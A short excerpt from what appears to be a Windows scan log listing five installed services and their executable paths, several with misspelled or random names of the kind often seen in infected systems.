[05-SERVICE]**Visual Studio Analyzer RPC bridge -/- Visual Studio Analyzer RPC bridge -/- C:\Program Files\Microsoft Visual Studio\Common\Tools\VS-Ent98\Vanalyzr\varpc.exe
[05-SERVICE]**WaklSvc -/- Windows Infomation Linepress -/- C:\WINDOWS\System32\tcpwakllib.exe
[05-SERVICE]**Wi32nHelp32 -/- Window3s Help System -/- C:\WINDOWS\system32\21lp32.exe
[05-SERVICE]**WinHqfq32 -/- Windows Huex System -/- C:\WINDOWS\system32\WinHmok32.exe
[05-SERVICE]**Wnxwas qaajla -/- Qeolvc wtsikebx -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe